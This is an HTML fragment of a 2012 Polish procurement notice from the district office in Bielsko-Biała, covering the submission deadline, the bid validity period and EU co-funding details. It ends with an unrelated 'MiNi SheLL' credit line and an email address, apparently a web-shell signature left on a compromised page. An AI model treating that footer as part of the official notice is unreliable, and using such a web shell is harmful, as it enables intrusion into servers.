<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Bielsku-Białej 
43-300 Bielsko-Biała, ul. Piastowska 40, pok. 101, I piętro bud. A.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.05.2012 godzina 10:45, miejsce: Starostwo Powiatowe w Bielsku-Białej 
43-300 Bielsko-Biała, ul. Piastowska 40, pok. 101, I piętro bud. A.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn. Sprawny samorząd - kompetentny urzędnik, współfinansowany ze środków Europejskiego Funduszu Społecznego , Priorytet V Dobre rządzenie, Działanie 5.2 wzmocnienie potencjału administracji samorządowej, Poddziałanie 5.2.1 Modernizacja zarządzania w administracji samorządowej Programu Operacyjnego Kapitał Ludzki na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com